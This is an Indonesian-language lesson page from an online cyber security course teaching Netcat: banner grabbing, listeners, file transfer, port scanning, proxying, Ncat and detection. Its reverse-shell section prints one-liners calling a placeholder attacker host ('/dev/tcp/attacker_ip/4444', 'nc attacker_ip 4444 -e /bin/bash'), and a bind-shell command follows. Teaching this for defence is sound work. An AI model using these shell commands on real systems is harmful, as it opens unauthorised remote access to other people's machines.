Netcat: Pisau Serbaguna
Gunakan nc untuk banner, transfer file, penerusan port, dan shell balik sederhana.
Netcat: Pisau Serbaguna adalah pelajaran Cyber Security Academy gratis di CoddyKit. Ini adalah pelajaran 3 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Cyber Security Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Apa Itu Netcat
Netcat (nc) adalah utilitas yang membaca dan menulis data melalui koneksi jaringan menggunakan TCP atau UDP. Netcat terpasang di hampir setiap sistem Unix dan sangat berguna untuk penelusuran kesalahan, transfer berkas, dan eksploitasi dasar.
Koneksi Dasar dan Pengambilan Banner
Sambungkan ke port TCP mana pun untuk mengambil banner layanan dan berinteraksi secara manual dengan protokolnya. Ini merupakan bentuk rekonesans yang paling sederhana.
# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]
# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTPMendengarkan pada Port
Netcat dapat mendengarkan koneksi masuk dengan -l -p. Ini berguna untuk menguji konektivitas, menangkap shell terbalik, dan menerima berkas.
# Listen on port 4444
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS resolution
# -p port numberTransfer Berkas dengan Netcat
Netcat dapat mengirim berkas dengan menyalurkannya ke koneksi. Penerima mendengarkan dan mengalihkan keluaran ke berkas. Tanpa enkripsi — gunakan hanya pada jaringan tepercaya.
# Receiver (runs first):
nc -lvnp 4444 > received_file.txt
# Sender:
nc 192.168.1.10 4444 < file_to_send.txtPemindaian Port dengan Netcat
Netcat dapat melakukan pemindaian port dasar dengan -z (mode tanpa operasi masukan/keluaran) dan -w (batas waktu). Lebih lambat daripada Nmap, tetapi berguna saat Nmap tidak tersedia.
# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded
# With timeout:
nc -zvw2 192.168.1.100 22 80 443Shell Terbalik Sederhana
Shell terbalik membuat target terhubung kembali ke penyerang. Ini berguna dalam pengujian penetrasi ketika aturan firewall memblokir koneksi masuk ke target.
# Attacker listens:
nc -lvnp 4444
# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Or via nc:
nc attacker_ip 4444 -e /bin/bashShell Terikat
Shell terikat mendengarkan pada mesin target. Penyerang menyambungkannya. Shell ini lebih jarang digunakan dalam pengujian penetrasi modern karena firewall biasanya memblokir koneksi masuk.
# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash
# On attacker: connect
nc target_ip 5555Mode UDP
Gunakan -u untuk koneksi UDP. Ini berguna untuk menguji layanan UDP seperti DNS (port 53) dan SNMP (port 161).
# Test DNS over UDP
nc -u 8.8.8.8 53
# Test SNMP
nc -u 192.168.1.1 161Membuat Proksi dengan Netcat
Netcat dapat merangkai koneksi untuk berpindah melalui jaringan. Jika digabungkan dengan pipa bernama (mkfifo), Netcat dapat membuat terowongan dua arah sederhana tanpa alat tambahan.
mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipeNcat: Alternatif Modern
Ncat (bagian dari Nmap) memperluas Netcat dengan dukungan SSL (--ssl), kontrol akses, dan mode perantara. Gunakan Ncat untuk saluran terenkripsi.
# SSL listener
ncat --ssl -lvnp 4444
# SSL connect
ncat --ssl target_ip 4444Pihak Defensif: Mendeteksi Netcat
Koneksi Netcat terlihat seperti TCP normal. Pihak defensif dapat mendeteksinya melalui pemantauan nama proses (HIDS), port keluar yang tidak lazim, dan shell yang dibuat dari proses induk yang tidak terduga.
Pemeriksaan Singkat
Opsi Netcat mana yang mengaktifkan mode mendengarkan?
Ringkasan: Netcat
Netcat adalah alat dasar yang penting: gunakan untuk mengambil banner, mentransfer berkas, menguji konektivitas, dan memahami mekanisme shell terbalik atau shell terikat. Dalam pengujian penetrasi berizin, Netcat memvalidasi aturan firewall dan menyimulasikan perpindahan penyerang melalui jaringan. Kuasai alat ini — baik untuk menggunakannya maupun untuk mendeteksinya.
Pertanyaan yang Sering Diajukan
Apakah pelajaran “Netcat: Pisau Serbaguna” gratis?
Ya — teks lengkap “Netcat: Pisau Serbaguna” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Cyber Security Academy, upgrade ke CoddyKit PRO. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Apa yang akan aku pelajari di “Netcat: Pisau Serbaguna”?
Gunakan nc untuk banner, transfer file, penerusan port, dan shell balik sederhana. Kamu berlatih Cyber Security Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.
Apakah aku perlu pengalaman untuk memulai Cyber Security Academy?
Tidak diperlukan pengalaman sebelumnya. Cyber Security Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 3 dari 4.
Berapa lama pelajaran “Netcat: Pisau Serbaguna” memakan waktu?
Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.
Bisakah aku menulis dan menjalankan kode dalam pelajaran Cyber Security Academy ini?
Ya. Setiap pelajaran Cyber Security Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.
Semua pelajaran dalam kursus ini
- Teknik Pemindaian Port Nmap
- Identifikasi Layanan dan OS
- Netcat: Pisau Serbaguna
- Skrip Enumerasi Jaringan